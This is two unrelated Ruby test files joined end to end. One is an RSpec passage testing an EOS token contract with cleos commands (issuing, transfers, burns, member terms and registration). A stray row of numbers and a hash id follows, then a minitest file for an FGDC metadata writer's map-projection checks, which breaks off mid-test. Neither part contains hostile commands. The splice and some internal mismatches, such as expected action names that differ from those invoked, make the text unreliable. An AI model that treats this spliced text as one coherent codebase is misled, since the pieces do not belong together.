result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "11000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stderr).to include('Error 3050003')
end
it "for inflation with valid auth should succeed" do
result = wrap_command %(cleos push action eosdactokens issue '{ "to": "eosdactokens", "quantity": "2000.0000 ABY", "memo": "Initial amount of tokens for you."}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens::issue')
end
end
context "Read back the stats after issuing currency should display max supply, supply and issuer" do
it do
result = wrap_command %(cleos get currency stats eosdactokens ABY)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"ABY": {
"supply": "3000.0000 ABY",
"max_supply": "10000.0000 ABY",
"issuer": "eosdactokens"
}
}
JSON
end
end
context "Transfer some tokens" do
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABY", "memo": "my first transfer"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABY", "memo": "my first transfer"}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth should succeed" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosdactokens", "to": "eosio", "quantity": "500.0000 ABY", "memo": "my first transfer"}' --permission eosdactokens@active)
expect(result.stdout).to include('500.0000 ABY')
end
it "with amount greater than balance should fail" do
result = wrap_command %(cleos push action eosdactokens transfer '{ "from": "eosio", "to": "eosdactokens", "quantity": "50000.0000 ABY", "memo": "my first transfer"}' -p eosio)
expect(result.stderr).to include('Error 3050003')
end
it "Read back the result balance" do
result = wrap_command %(cleos get currency balance eosdactokens eosdactokens)
expect(result.stdout).to include('500.0000 ABY')
end
end
describe "Unlock tokens" do
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens unlock '{"unlock": "9500.0000 ABP"}')
expect(result.stderr).to include('Error 3040003')
end
context "with auth should succeed" do
before do
run %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABX", "transfer_locked": true}' -p eosdactokens)
end
it do
result = wrap_command %(cleos push action eosdactokens unlock '{"unlock": "9500.0000 ABX"}' -p eosdactokens)
expect(result.stdout).to include('eosdactokens <= eosdactokens::unlock')
end
end
end
context "Burn tokens" do
before(:all) do
run %(cleos push action eosdactokens create '{ "issuer": "eosdactokens", "maximum_supply": "10000.0000 ABZ", "transfer_locked": true}' -p eosdactokens)
end
context "before unlocking token should fail" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "eosdactokens", "quantity": "9500.0000 ABZ"}' -p eosdactokens)
expect(result.stderr).to include('Error 3050003')
end
end
context "After unlocking token" do
before(:all) do
run %(cleos push action eosdactokens unlock '{"unlock": "9500.0000 ABP"}' -p eosdactokens)
end
context "more than available supply should fail" do
before do
run %(cleos push action eosdactokens transfer '{"from": "eosdactokens", "to": "testuser1", "quantity": "900.0000 ABP", "memo": "anything"}' -p eosdactokens)
end
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "testuser1", "quantity": "9600.0000 ABP"}' -p testuser1)
expect(result.stderr).to include('Error 3050003')
end
end
context "without auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{ "from": "eosdactokens","quantity": "500.0000 ABP"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
end
context "with wrong auth should fail" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "eosdactokens", "quantity": "500.0000 ABP"}' -p eosio)
expect(result.stderr).to include('Error 3090004')
end
end
context "with legal amount of tokens should succeed" do
it do
result = wrap_command %(cleos push action eosdactokens burn '{"from": "testuser1", "quantity": "90.0000 ABP"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::burn')
end
end
end
end
context "Read back the stats after burning currency should display reduced supply, same max supply and issuer" do
it do
result = wrap_command %(cleos get currency stats eosdactokens ABP)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"ABP": {
"supply": "910.0000 ABP",
"max_supply": "10000.0000 ABP",
"issuer": "eosdactokens"
}
}
JSON
end
end
context "newmemterms" do
it "without valid auth" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "New Latest terms", "hash": "termshashsdsdsd", "dac_id": "eosdac"}' -p tester1)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked')
end
it "without empty terms" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "", "hash": "termshashsdsdsd", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with long terms" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "aasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdfasdfasdfasddasdf", "hash": "termshashsdsdsd", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "without empty hash" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms", "hash": "", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with long hash" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms", "hash": "asdfasdfasdfasdfasdfasdfasdfasdfl", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with valid terms and hash" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms", "hash": "asdfasdfasdfasdfasdfasd", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stdout).to include('eosdactokens <= eosdactokens::newmemterms')
end
context "for other dac" do
it "with non matching auth" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "otherlegalterms", "hash": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p testuser1)
expect(result.stderr).to include('missing authority of otherdacacc')
end
it "with matching auth" do
result = wrap_command %(cleos push action eosdactokens newmemtermse '{ "terms": "otherlegalterms", "hash": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p otherdacacc)
expect(result.stdout).to include('eosdactokens <= eosdactokens::newmemtermse')
end
end
end
context "Read back the memberterms for eosdactokens", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens eosdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "normallegalterms",
"hash": "asdfasdfasdfasdfasdfasd",
"version": 1
}
],
"more": false
}
JSON
end
end
context "Read back the memberterms for otherdac", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens otherdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "otherlegalterms",
"hash": "asdfasdfasdfasdfffffasd",
"version": 1
}
],
"more": false
}
JSON
end
end
context "updatetermse" do
it "without valid auth" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "termshashsdsdsd", "dac_id": "eosdac"}' -p tester1)
expect(result.stderr).to include('Ensure that you have the related private keys inside your wallet and your wallet is unlocked')
end
it "with long terms" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "lkhasdfkjhasdkfjhaksdljfhlkajhdflkhadfkahsdfkjhasdkfjhaskdfjhaskdhfkasjdhfkhasdfkhasdfkjhasdkfjhklasdflkhasdfkjhasdkfjhaksdljfhlkajhdflkhadfkahsdfkjhasdkfjhaskdfjhaskdhfkasjdhfkhasdfkhasdfkjhasdfkjhasdkfjhaksdljfhlkajhdflkhadfkahsdfkjhasdkfjhaskdfjhaskdhfkasjdhfkhasdfkhasdfkjhasdkfjhklasdf", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3050003')
end
it "with valid terms" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "newtermslocation", "dac_id": "eosdac"}' -p dacauthority)
expect(result.stdout).to include('eosdactokens <= eosdactokens::updatetermse')
end
context "for other dac" do
it "with non matching auth" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p testuser1)
expect(result.stderr).to include('missing authority of otherdacacc')
end
it "with matching auth" do
result = wrap_command %(cleos push action eosdactokens updatetermse '{ "termsid": 1, "terms": "otherdacterms", "dac_id": "otherdac"}' -p otherdacacc)
expect(result.stdout).to include('eosdactokens <= eosdactokens::updatetermse')
end
end
end
context "Read back the memberterms for eosdactokens", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens eosdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "newtermslocation",
"hash": "asdfasdfasdfasdfasdfasd",
"version": 1
}
],
"more": false
}
JSON
end
end
context "Read back the memberterms for otherdac", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens otherdac memberterms)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [{
"terms": "otherdacterms",
"hash": "asdfasdfasdfasdfffffasd",
"version": 1
}
],
"more": false
}
JSON
end
end
describe "Member reg" do
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "eosio", "agreedterms": "New Latest terms", "dac_id": "eosdac"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "eosio", "agreedterms": "New Latest terms", "dac_id": "eosdac"}' -p testuser2)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth for second account should succeed" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser2", "agreedterms": "asdfasdfasdfasdfasdfasd", "dac_id": "eosdac"}' -p testuser2)
expect(result.stdout).to include('eosdactokens::memberrege')
end
context "for other dac" do
it "with invalid managing_account should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "eosio", "agreedterms": "New Latest terms", "dac_id": "eosdac"}' -p eosdactokens)
expect(result.stderr).to include('Error 3090004')
end
it "with valid managing account should succeed" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser1", "agreedterms": "asdfasdfasdfasdfffffasd", "dac_id": "otherdac"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::memberrege')
end
end
context "Read back the result for regmembers in eosdactokens hasagreed should have one account", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens eosdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser2", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
context "Read back the result for regmembers in eosdactokens hasagreed should have one account", focus: true do
it do
result = wrap_command %(cleos get table eosdactokens otherdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser1", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
end
context "Update existing member reg" do
before(:all) do
run %(cleos push action eosdactokens newmemtermse '{ "terms": "normallegalterms2", "hash": "dfghdfghdfghdfghdfg", "dac_id": "otherdac"}' -p eosdactokens -p otherdacacc)
end
it "without auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "tester3", "agreedterms": "subsequenttermsagreedbyuser", "dac_id": "eosdac"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "tester3", "agreedterms": "subsequenttermsagreedbyuser", "dac_id": "eosdac"}' -p eosdactokens)
expect(result.stderr).to include('Error 3090004')
end
it "with valid auth" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser3", "agreedterms": "asdfasdfasdfasdfasdfasd", "dac_id": "eosdac"}' -p testuser3)
expect(result.stdout).to include('eosdactokens::memberrege')
end
context "for other dac" do
it "with invalid managing_account should fail" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser3", "agreedterms": "dfghdfghdfghdfghdfg", "dac_id": "otherdac"}' -p dacauthority)
expect(result.stderr).to include('Error 3090004')
end
it "with valid managing account should succeed" do
result = wrap_command %(cleos push action eosdactokens memberrege '{ "sender": "testuser1", "agreedterms": "dfghdfghdfghdfghdfg", "dac_id": "otherdac"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::memberrege')
end
end
end
context "Read back the result for regmembers on eosdactokens hasagreed should have entry" do
it do
result = wrap_command %(cleos get table eosdactokens eosdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser2", "agreedtermsversion":1},
{"sender":"testuser3", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
context "Read back the result for regmembers hasagreed should have entry" do
it do
result = wrap_command %(cleos get table eosdactokens otherdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<~JSON
{
"rows": [
{"sender":"testuser1", "agreedtermsversion":2}
],
"more": false
}
JSON
end
end
describe "Unregister existing member" do
it "without correct auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser3", "dac_id": "eosdac"}')
expect(result.stderr).to include('Transaction should have at least one required authority')
end
it "with mismatching auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser3", "dac_id": "eosdac"}' -p currency)
expect(result.stderr).to include('Error 3090003')
end
it "with correct auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser3", "dac_id": "eosdac"}' -p testuser3)
expect(result.stdout).to include('eosdactokens::memberunrege')
end
context "for other dac" do
it "with invalid managing account" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser1", "dac_id": "invaliddac"}' -p testuser1)
expect(result.stderr).to include('dac with dac_name not found')
end
it "with correct auth" do
result = wrap_command %(cleos push action eosdactokens memberunrege '{ "sender": "testuser1", "dac_id": "otherdac"}' -p testuser1)
expect(result.stdout).to include('eosdactokens::memberunrege')
end
end
end
context "Read back the result for regmembers has agreed should be 0" do
it do
result = wrap_command %(cleos get table eosdactokens eosdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<-JSON
{
"rows": [
{"sender":"testuser2", "agreedtermsversion":1}
],
"more": false
}
JSON
end
end
context "Read back the result for regmembers has agreed should be 0" do
it do
result = wrap_command %(cleos get table eosdactokens otherdac members)
expect(JSON.parse(result.stdout)).to eq JSON.parse <<-JSON
{
"rows": [],
"more": false
}
JSON
end
end
end
| 50.369048 | 562 | 0.666239 |
2650e40ee680164d90ca33c3b783d06fddd4c512 | 73,380 | # MdTranslator - minitest of
# writers / fgdc / class_spatialReference
# History:
# Stan Smith 2018-01-03 original script
require_relative 'fgdc_test_parent'
require_relative '../../helpers/mdJson_hash_objects'
require_relative '../../helpers/mdJson_hash_functions'
class TestWriterFgdcMapProjection < TestWriterFGDCParent
# instance classes needed in script
TDClass = MdJsonHashWriter.new
# read the fgdc reference file
@@path = './metadata/spref/horizsys/planar/mapproj'
xFile = TestWriterFGDCParent.get_xml('mapProjection')
@@axExpect = xFile.xpath(@@path)
def get_response(hProjection)
mdHash = TDClass.base
hSpaceRef = TDClass.spatialReferenceSystem
hSpaceRef[:referenceSystemParameterSet][:projection] = hProjection
mdHash[:metadata][:resourceInfo][:spatialReferenceSystem] = []
mdHash[:metadata][:resourceInfo][:spatialReferenceSystem] << hSpaceRef
mdHash[:metadata][:resourceInfo][:spatialRepresentationType] = []
mdHash[:metadata][:resourceInfo][:spatialRepresentationType] << 'spatial representation type'
hResponseObj = ADIWG::Mdtranslator.translate(
file: mdHash.to_json, reader: 'mdJson', writer: 'fgdc', showAllTags: true, validate: 'none'
)
return hResponseObj
end
def test_mapProjection_alaska
expect = @@axExpect[0].to_s.squeeze(' ')
hProjection = TDClass.build_projection('alaska', 'Alaska Modified Stereographic')
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 2, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 2, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection alaska'
end
# map projections - albers
def test_mapProjection_albers
expect = @@axExpect[1].to_s.squeeze(' ')
hProjection = TDClass.build_projection('albers', 'Albers Conical Equal Area')
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:standardParallel2] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection albers'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:standardParallel2)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection albers'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection albers'
end
# map projections - azimuthal equidistant
def test_mapProjection_azimuthalEquidistant
expect = @@axExpect[2].to_s.squeeze(' ')
hProjection = TDClass.build_projection('azimuthalEquidistant', 'Azimuthal Equidistant')
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection azimuthalEquidistant'
end
# map projections - equidistant conic
def test_mapProjection_equidistantConic
expect = @@axExpect[3].to_s.squeeze(' ')
hProjection = TDClass.build_projection('equidistantConic', 'Equidistant Conic')
TDClass.add_standardParallel(hProjection, 2)
TDClass.add_longCM(hProjection)
TDClass.add_latPO(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:standardParallel2] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hProjection[:latitudeOfProjectionOrigin] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:standardParallel2)
hProjection.delete(:longitudeOfCentralMeridian)
hProjection.delete(:latitudeOfProjectionOrigin)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection origin is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equidistantConic'
end
# map projections - equirectangular
def test_mapProjection_equirectangular
expect = @@axExpect[4].to_s.squeeze(' ')
hProjection = TDClass.build_projection('equirectangular', 'Equirectangular')
TDClass.add_standardParallel(hProjection, 1)
TDClass.add_longCM(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:standardParallel1] = nil
hProjection[:longitudeOfCentralMeridian] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:standardParallel1)
hProjection.delete(:longitudeOfCentralMeridian)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 4, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection standard parallel is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of central meridian is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection equirectangular'
end
# map projections - general vertical near-side perspective
def test_mapProjection_generalVertical
expect = @@axExpect[5].to_s.squeeze(' ')
hProjection = TDClass.build_projection('generalVertical', 'General Vertical Near-sided Perspective')
TDClass.add_heightPP(hProjection)
TDClass.add_longPC(hProjection)
TDClass.add_latPC(hProjection)
TDClass.add_falseNE(hProjection)
hResponseObj = get_response(hProjection)
xMetadata = Nokogiri::XML(hResponseObj[:writerOutput])
xGot = xMetadata.xpath(@@path)
got = xGot.to_s.squeeze(' ')
assert_equal expect, got
assert hResponseObj[:writerPass]
assert_empty hResponseObj[:writerMessages]
# test empty elements
hProjection[:falseNorthing] = nil
hProjection[:falseEasting] = nil
hProjection[:heightOfProspectivePointAboveSurface] = nil
hProjection[:longitudeOfProjectionCenter] = nil
hProjection[:latitudeOfProjectionCenter] = nil
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection height of perspective point above surface is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection longitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection latitude of projection center is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false easting is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection false northing is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
# test missing elements
hProjection.delete(:falseNorthing)
hProjection.delete(:falseEasting)
hProjection.delete(:heightOfProspectivePointAboveSurface)
hProjection.delete(:longitudeOfProjectionCenter)
hProjection.delete(:latitudeOfProjectionCenter)
hResponseObj = get_response(hProjection)
refute hResponseObj[:writerPass]
assert_equal 5, hResponseObj[:writerMessages].length
assert_includes hResponseObj[:writerMessages], 'ERROR: FGDC writer: map projection height of perspective point above surface is missing: CONTEXT is spatial reference horizontal planar map projection generalVertical'
